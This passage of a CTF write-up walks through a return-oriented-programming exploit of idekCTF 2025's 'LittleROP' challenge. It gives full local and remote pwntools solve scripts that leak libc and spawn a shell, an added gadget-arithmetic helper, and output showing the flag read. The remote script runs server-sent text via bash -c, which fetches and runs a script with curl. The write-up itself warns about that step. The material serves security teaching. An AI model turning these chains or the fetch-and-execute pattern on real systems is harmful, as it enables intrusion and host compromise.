0x0000000000404a00      0x00000000004011bf\n0x404d50:       0x0000000000404a00      0x00000000004011a9\n0x404d60:       0x0000000000404820      
0x00000000004011bf\n0x404d70:       0x0000000000404d55      0x00007ffff7e145ca\n0x404d80:       0x00000000000932f1      0x000000000040113c\n0x404d90:       0x00000000004011bf      0x0000000000404a00\n0x404da0:       0x00000000004011a9      0x0000000000404a00\n0x404db0:       0x00000000004011bf      0x0000000000404a00\n0x404dc0:       0x00000000004011a9      0x0000000000404a00\n0x404dd0:       0x0000000000404820      0x00000000004011bf\n0x404de0:       0x0000000000000000      0x0000000000000000\n0x404df0:       0x0000000000000000      0x0000000000000000\ngdb-peda$ x\/a 0x00007ffff7e9e870\n0x7ffff7e9e870 &lt;__GI___libc_write>:     0x25048b64fa1e0ff3\ngdb-peda$ x\/i 0x00007ffff7e9e870\n   0x7ffff7e9e870 &lt;__GI___libc_write>:  endbr64 \n<\/pre>\n\n\n\n<p>Then write is called and the libc-related addresses that were sitting in the bss area are printed out; with a bit of offset arithmetic, the libc base address could be obtained.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">leak = r(0x10)\nleak = leak[8:8+8]\ninfo(f\"leak: {leak}\")\nleak = uu64(leak)\ninfo(f\"leak: {hex(leak)}\")\nl.address = leak - l.sym._IO_2_1_stderr_\ninfo(f\"libc base: {hex(l.address)}\")\n\nr(0x20)\n<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@06287c6a0589:~\/study\/idekctf2025\/LittleROP$ python3 solve_local.py\n[+] Starting local process '.\/chall': pid 5923\n[*] leak: b'\\\\xa0V\\\\xfa\\\\xf7\\\\xff\\\\x7f\\\\x00\\\\x00'\n[*] 
leak: 0x7ffff7fa56a0\n[*] libc base: 0x7ffff7d8a000\n<\/pre>\n\n\n\n<p>With the libc base known, the rest is an ordinary ROP chain that calls <code>system(\"\/bin\/sh\")<\/code>. The chain itself (pop rdi; ret, the address of the \"\/bin\/sh\" string, system; the second copy of system is only padding to fill 32 bytes) goes into the buffer, and the overwritten rbp is set 8 bytes below the chain: one more trip through vuln's read and its leave; ret then leaves rsp pointing at the chain.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># set final rop payload !!!\n\nretn = l.address + 0xC738A\npop_rdi_retn = l.address + 0xC7389\nbin_sh = l.address + 0x1D8678\nsystem = l.sym.system\n\npay = p64(pop_rdi_retn) + p64(bin_sh) + p64(system)*2\npay += p64(0x4049b8+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\ns(b\"win\")\n\npi()\n<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">solve.py (Local)<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#!\/usr\/bin\/env python3\n\nfrom pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\nimport sys\n\np = process(\".\/chall\")\n# p = remote(\"host3.dreamhack.games\", 20548)\ne = ELF('.\/chall',checksec=False)\nl = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\n# l = ELF('.\/libc_prob.so.6', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = 
lambda: p.interactive()\n\nvuln_lea_read = 0x4011a9\nadd_rbp_0x3d_ebx = 0x40113c\n\n# 1. Prepare write to where\npay = b'A'*0x20\npay += p64(0x404c00)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# 2. \npay = b'A'*0x20\npay += p64(0x404b00)\npay += p64(0x4011ca) #setup\ns(pay)\nsleep(0.001)\n\n# 3. libc fengshui\ndef fengshui_libc():\n    for i in range(5):\n        pay = b'B'*0x20\n        pay += p64(0x404c00+0x70*i)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n        pay = b'C'*0x20\n        pay += p64(0x404900)\n        pay += p64(0x4011ca) #setup\n        s(pay)\n        sleep(0.001)\n\nfengshui_libc()\n\ndef fengshui_ret_rbp(base):\n    for i in range(2):\n        #set where to write\n        pay = b'b'*0x20\n        pay += p64(base+i*0x20 + 0x20) #where to where\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n        #rbp reset and write\n        pay = (p64(vuln_lea_read) + p64(0x404a00)) * 2 #what\n        pay += p64(0x404800 + 0x20)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\ndef fengshui_rbp_ret(base):\n    for i in range(2):\n        #set where to write\n        pay = b'b'*0x20\n        pay += p64(base+i*0x20 + 0x20) #where to where\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n        #rbp reset and write\n        pay = (p64(0x404a00) + p64(vuln_lea_read)) * 2 #write to what\n        pay += p64(0x404800 + 0x20)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n# 0. (overwrite rbp), this will used by \"add    DWORD PTR [rbp-0x3d],ebx\" gadget\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d70+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(0x404d08 + 0x3d) #set rbp\ns(pay)\nsleep(0.001)\n\n# 1. 
set \"pop rbx; retn;\" gadget (overwrite retn)\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d78+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:000000000008A5CA 5B                                      pop     rbx\n# .text:000000000008A5CB C3                                      retn\npay = p8(0xca) #set gadget\ns(pay)\nsleep(0.001)\n\n#2. set rbx value\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d80+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:00000000000C7389 5F                                      pop     rdi\n# .text:00000000000C738A C3                                      retn\npay = p64(0x3cddc) #rbx value (will be added); 0x8a5ad + 0x3cddc = 0xc7389\ns(pay)\nsleep(0.001)\n\n#3. set \"add [rbp-3Dh], ebx; nop; retn;\" gadget\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d88+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# set rbx\npay = p64(add_rbp_0x3d_ebx) #set gadget\ns(pay)\nsleep(0.001)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d70) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.001)\n\n# set rop again\n# 0. (overwrite rbp), this will used by \"add    DWORD PTR [rbp-0x3d],ebx\" gadget\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d70+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(0x404d18 + 0x3d) #set rbp\ns(pay)\nsleep(0.001)\n\n# 1. set \"pop rbx; retn;\" gadget (overwrite retn)\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d78+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:000000000008A5CA 5B                                      pop     rbx\n# .text:000000000008A5CB C3                                      retn\npay = p8(0xca) #set gadget\ns(pay)\nsleep(0.001)\n\n#2. 
set rbx value\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d80+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:0000000000114870                         write \npay = p64(0x932f1) #rbx value (will be added); 0x8157f + 0x932f1 = 0x114870\ns(pay)\nsleep(0.001)\n\n#3. set \"add [rbp-3Dh], ebx; nop; retn;\" gadget\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d88+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# set rbx\npay = p64(add_rbp_0x3d_ebx) #set gadget\ns(pay)\nsleep(0.001)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d70) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.001)\n\n# will be used rbp when run \"pop rdi\" gadget\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'c'*0x20\npay += p64(0x404d00+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(0x404a00) \ns(pay)\nsleep(0.001)\n\n# will be used when run \"pop rdi\" gadget\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'c'*0x20\npay += p64(0x404d10+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(1) #set rdi\ns(pay)\nsleep(0.001)\n\n# set ret\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'd'*0x20\npay += p64(0x404d20+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d00) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.001)\n\n# obtain libc base\nleak = r(0x10)\nleak = leak[8:8+8]\ninfo(f\"leak: {leak}\")\nleak = uu64(leak)\ninfo(f\"leak: {hex(leak)}\")\nl.address = leak - l.sym._IO_2_1_stderr_\ninfo(f\"libc base: {hex(l.address)}\")\n\nr(0x20)\n\n# set final rop payload !!!\n\nretn = l.address + 0xC738A\npop_rdi_retn = l.address + 0xC7389\nbin_sh = l.address + 0x1D8678\nsystem = l.sym.system\n\npay = p64(pop_rdi_retn) + p64(bin_sh) + p64(system)*2\npay += p64(0x4049b8+0x20)\npay += 
p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\ns(b\"win\")\n\npi()\n<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">solve.py (server)<\/h3>\n\n\n\n<p>Same chain as the local script with three changes: the kCTF proof-of-work prompt is answered first, every send is followed by <code>sleep(0.4)<\/code> instead of <code>sleep(0.001)<\/code> so that each <code>read(0, buf, 0x30)<\/code> sees exactly one payload and consecutive sends do not coalesce over the network, and the loops are wrapped in tqdm's <code>trange<\/code> for progress output. Note that the proof-of-work handler passes the command line the server sends straight to <code>bash -c<\/code>, i.e. it executes remote-supplied text on the solver's own machine; run it in a disposable container or inspect the command before letting it run.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#!\/usr\/bin\/env python3\n\nfrom pwn import *\nfrom tqdm import *\n\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\nimport sys\nimport subprocess\n\n# p = process(\".\/chall\")\np = remote(\"little-rop.chal.idek.team\", 1337)\ne = ELF('.\/chall',checksec=False)\nl = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\n# l = ELF('.\/libc_prob.so.6', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\nvuln_lea_read = 0x4011a9\nadd_rbp_0x3d_ebx = 0x40113c\n\n## Robot check (kCTF proof-of-work)\nleak =  ru(b\"Solution? \")\ncmd = leak.split(b\"    \")[1]\ncmd = cmd.split(b\"\\\\n\")[0]\ninfo(f\"cmd = {cmd}\")\n\nproc = subprocess.run(\n    [\"bash\", \"-c\", cmd],\n    stdout=subprocess.PIPE,\n    stderr=subprocess.PIPE,\n    text=True,        # return the result as str\n    check=True        # raise if the solver exits non-zero\n)\n\nanswer = proc.stdout.strip()\n\ninfo(f\"answer: {answer}\")\n\nsl(answer)\n\n# pi()\n\n# 1. 
Prepare write to where\npay = b'A'*0x20\npay += p64(0x404c00)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# 2. \npay = b'A'*0x20\npay += p64(0x404b00)\npay += p64(0x4011ca) #setup\ns(pay)\nsleep(0.4)\n\n# 3. libc fengshui\ndef fengshui_libc():\n    for i in trange(5):\n        pay = b'B'*0x20\n        pay += p64(0x404c00+0x70*i)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.4)\n\n        pay = b'C'*0x20\n        pay += p64(0x404900)\n        pay += p64(0x4011ca) #setup\n        s(pay)\n        sleep(0.4)\n\nfengshui_libc()\n\ndef fengshui_ret_rbp(base):\n    for i in trange(2):\n        #set where to write\n        pay = b'b'*0x20\n        pay += p64(base+i*0x20 + 0x20) #where to where\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.4)\n\n        #rbp reset and write\n        pay = (p64(vuln_lea_read) + p64(0x404a00)) * 2 #what\n        pay += p64(0x404800 + 0x20)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.4)\n\ndef fengshui_rbp_ret(base):\n    for i in trange(2):\n        #set where to write\n        pay = b'b'*0x20\n        pay += p64(base+i*0x20 + 0x20) #where to where\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.4)\n\n        #rbp reset and write\n        pay = (p64(0x404a00) + p64(vuln_lea_read)) * 2 #write to what\n        pay += p64(0x404800 + 0x20)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.4)\n\n# 0. (overwrite rbp), this will used by \"add    DWORD PTR [rbp-0x3d],ebx\" gadget\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d70+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = p64(0x404d08 + 0x3d) #set rbp\ns(pay)\nsleep(0.4)\n\n# 1. 
set \"pop rbx; retn;\" gadget (overwrite retn)\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d78+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# .text:000000000008A5CA 5B                                      pop     rbx\n# .text:000000000008A5CB C3                                      retn\npay = p8(0xca) #set gadget\ns(pay)\nsleep(0.4)\n\n#2. set rbx value\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d80+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# .text:00000000000C7389 5F                                      pop     rdi\n# .text:00000000000C738A C3                                      retn\npay = p64(0x3cddc) #rbx value (will be added); 0x8a5ad + 0x3cddc = 0xc7389\ns(pay)\nsleep(0.4)\n\n#3. set \"add [rbp-3Dh], ebx; nop; retn;\" gadget\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d88+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# set rbx\npay = p64(add_rbp_0x3d_ebx) #set gadget\ns(pay)\nsleep(0.4)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d70) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.4)\n\n# set rop again\n# 0. (overwrite rbp), this will used by \"add    DWORD PTR [rbp-0x3d],ebx\" gadget\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d70+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = p64(0x404d18 + 0x3d) #set rbp\ns(pay)\nsleep(0.4)\n\n# 1. set \"pop rbx; retn;\" gadget (overwrite retn)\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d78+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# .text:000000000008A5CA 5B                                      pop     rbx\n# .text:000000000008A5CB C3                                      retn\npay = p8(0xca) #set gadget\ns(pay)\nsleep(0.4)\n\n#2. 
set rbx value\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d80+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# .text:0000000000114870                         write \npay = p64(0x932f1) #rbx value (will be added); 0x8157f + 0x932f1 = 0x114870\ns(pay)\nsleep(0.4)\n\n#3. set \"add [rbp-3Dh], ebx; nop; retn;\" gadget\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d88+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# set rbx\npay = p64(add_rbp_0x3d_ebx) #set gadget\ns(pay)\nsleep(0.4)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d70) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.4)\n\n# will be used rbp when run \"pop rdi\" gadget\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'c'*0x20\npay += p64(0x404d00+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = p64(0x404a00) \ns(pay)\nsleep(0.4)\n\n# will be used when run \"pop rdi\" gadget\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'c'*0x20\npay += p64(0x404d10+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = p64(1) #set rdi\ns(pay)\nsleep(0.4)\n\n# set ret\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'd'*0x20\npay += p64(0x404d20+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d00) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.4)\n\n# obtain libc base\nleak = r(0x40)\ninfo(f\"leak: {leak}\")\n# pi()\nleak = leak[0x10:0x10+8]\ninfo(f\"leak: {leak}\")\nleak = uu64(leak)\ninfo(f\"leak: {hex(leak)}\")\nl.address = leak - l.sym._IO_2_1_stderr_\ninfo(f\"libc base: {hex(l.address)}\")\n\n# set final rop payload !!!\n\nretn = l.address + 0xC738A\npop_rdi_retn = l.address + 0xC7389\nbin_sh = l.address + 0x1D8678\nsystem = l.sym.system\n\npay = p64(pop_rdi_retn) + p64(bin_sh) + p64(system)*2\npay += p64(0x4049b8+0x20)\npay += 
p64(vuln_lea_read)\ns(pay)\nsleep(0.4)\n\ns(b\"win\")\n\npi()\n<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Result<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@4b44540d70d5:~\/study\/idekCTF\/attachments$ python3 solve5_server.py\n[+] Opening connection to little-rop.chal.idek.team on port 1337: Done\n[*] cmd = b'python3 &lt;(curl -sSL &lt;https:\/\/goo.gle\/kctf-pow>) solve s.AA+r.AABye4oxHgxTHZSoOwrZKMUf'\n[*] answer: s.AABgMxwKVIDz4moR8Uk\/af0BoBLAeQkOZjkQNHdae4DzAiFPnLWeYJAPaF0gck\/BN4elxuR5RFPgQ8KgfJXoo5hzDGRz4q5ggxKyh5ek96C133SsIyETSwiBDtUVYEXi8B\/Tz8z\/JZrhIGIvFElTwvWYpSu0Op9esxXt8SVvPdnKtA5Jt\/03Tfh6yfhJmaDUPVN5ek02R3jwxD2s04D8e2jR\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5\/5 [00:04&lt;00:00,  1.19it\/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2\/2 [00:01&lt;00:00,  1.20it\/s]\n(10 more identical 2\/2 tqdm progress bars, one per remaining fengshui_* loop, omitted; bars shortened)\n[*] leak: b'Correct\\\\naM@\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa0\\\\xb6\\\\x821xz\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00J@\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x89sm1xz\\\\x00\\\\x00'\n[*] leak: b'\\\\xa0\\\\xb6\\\\x821xz\\\\x00\\\\x00'\n[*] leak: 0x7a783182b6a0\n[*] libc base: 0x7a7831610000\n[*] Switching to interactive mode\n$ cat \/flag.txt\nidek{R0p_r0P_R0P_5HOW_u$_7HE_R0P}$ \n[*] Interrupted\n[*] Closed connection to little-rop.chal.idek.team port 1337\nubuntu@4b44540d70d5:~\/study\/idekCTF\/attachments$ \n<\/pre>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[25,31],"class_list":["post-3921","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-pwnable","tag-rop"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3921","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3921"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3921\/re
visions"}],"predecessor-version":[{"id":3922,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3921\/revisions\/3922"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3921"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3921"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3921"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
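The pointer rewriting at the heart of the chain in the writeup above (the 0x3cddc and 0x932f1 deltas fed to the add dword ptr [rbp-0x3d], ebx; nop; ret gadget at 0x40113c, and the earlier one-byte 0xca patch) is easy to get wrong by a constant, and every mistake costs a full run of slow remote round-trips. The Python below is an added example, not the author's solve script or anything shipped with the challenge: it emulates the gadget and the one-byte overwrite on a simulated .bss page, derives the rbp/ebx pair from a source pointer and a target offset, and flags the one case a 32-bit add cannot handle (source and target differing in their upper 32 bits, i.e. libc straddling a 4 GiB boundary; a negative delta is fine because it simply wraps in ebx, and pop rbx pops a full qword of which the gadget uses only the low half). The libc offsets (0x8a5ad, 0x8157f, 0x8a5ca, 0xc7389, 0x114870), the slot addresses and the local libc base 0x7ffff7d8a000 are copied from the writeup; that the slot patched with p8(0xca) originally held libc+0x8a5ad is an assumption, since the writeup only shows its final value libc+0x8a5ca.

```python
# Added example, not part of the original writeup or its solve scripts.
# Models the effect of the challenge binary's
#     add dword ptr [rbp-0x3d], ebx ; nop ; ret      (0x40113c in the writeup)
# on a stray libc pointer that the fake stack in .bss already holds, and derives
# the rbp/ebx pair the chain must load before returning into the gadget.
# Offsets and addresses below are the ones the writeup reports; they are
# assumptions about its libc build, not looked up from a libc here.
import struct

GADGET_DISP = 0x3D          # the gadget writes to [rbp - 0x3d]

# libc offsets quoted in the writeup's solve script comments
OFF_SRC_PTR = 0x8A5AD       # stray libc return address found at 0x404d08 (assumed also at 0x404d78)
OFF_SRC_PTR2 = 0x8157F      # stray libc pointer found at 0x404d18
OFF_POP_RBX = 0x8A5CA       # pop rbx ; ret
OFF_POP_RDI = 0xC7389       # pop rdi ; ret
OFF_WRITE = 0x114870        # write()

LIBC_BASE = 0x7FFFF7D8A000  # local libc base printed by the writeup


def gadget_inputs(slot_addr, current_ptr, target_ptr):
    '''rbp and ebx that make the gadget turn current_ptr (stored at slot_addr)
    into target_ptr.  The add is 32 bits wide and its carry is discarded, so a
    negative delta simply wraps in ebx, but the two pointers must agree in
    their upper 32 bits: that fails only when the libc mapping happens to
    straddle a 4 GiB boundary, which the chain cannot fix and must detect.'''
    if (current_ptr >> 32) != (target_ptr >> 32):
        raise ValueError('upper 32 bits differ: dword add cannot reach target')
    ebx = (target_ptr - current_ptr) & 0xFFFFFFFF
    rbp = slot_addr + GADGET_DISP
    return rbp, ebx


def run_add_gadget(mem, region_base, rbp, ebx):
    '''Emulate add dword ptr [rbp-0x3d], ebx on mem (a bytearray mapped at
    region_base) exactly as the CPU does it: low dword only, carry dropped.'''
    off = rbp - GADGET_DISP - region_base
    (cur,) = struct.unpack_from('<I', mem, off)
    struct.pack_into('<I', mem, off, (cur + ebx) & 0xFFFFFFFF)


def run_byte_overwrite(mem, region_base, slot_addr, byte):
    '''Emulate the writeup's p8(0xca) trick: a 1-byte read() landing on the
    lowest byte of the pointer, usable only when source and target differ in
    that byte alone (0x8a5ad -> 0x8a5ca).'''
    mem[slot_addr - region_base] = byte


def rewrite_slot(libc_base, slot_addr, src_off, target_off):
    '''Worked run on a simulated .bss page: plant libc_base+src_off at
    slot_addr, compute the gadget inputs, apply the gadget and return
    (rbp, ebx, resulting pointer).'''
    region_base = slot_addr & ~0xFFF
    mem = bytearray(0x1000)
    struct.pack_into('<Q', mem, slot_addr - region_base, libc_base + src_off)
    rbp, ebx = gadget_inputs(slot_addr, libc_base + src_off, libc_base + target_off)
    run_add_gadget(mem, region_base, rbp, ebx)
    (result,) = struct.unpack_from('<Q', mem, slot_addr - region_base)
    return rbp, ebx, result


def byte_patch_slot(libc_base, slot_addr, src_off, low_byte):
    '''Same simulation for the one-byte overwrite; returns the patched pointer.'''
    region_base = slot_addr & ~0xFFF
    mem = bytearray(0x1000)
    struct.pack_into('<Q', mem, slot_addr - region_base, libc_base + src_off)
    run_byte_overwrite(mem, region_base, slot_addr, low_byte)
    (result,) = struct.unpack_from('<Q', mem, slot_addr - region_base)
    return result


if __name__ == '__main__':
    # the three rewrites the writeup performs, in chain order
    print(f'0x404d78 byte patch -> {byte_patch_slot(LIBC_BASE, 0x404D78, OFF_SRC_PTR, 0xCA):#x}')
    for slot, src, tgt in ((0x404D08, OFF_SRC_PTR, OFF_POP_RDI),
                           (0x404D18, OFF_SRC_PTR2, OFF_WRITE)):
        rbp, ebx, got = rewrite_slot(LIBC_BASE, slot, src, tgt)
        print(f'slot {slot:#x}: rbp={rbp:#x} ebx={ebx:#x} -> {got:#x} (libc+{got - LIBC_BASE:#x})')
```

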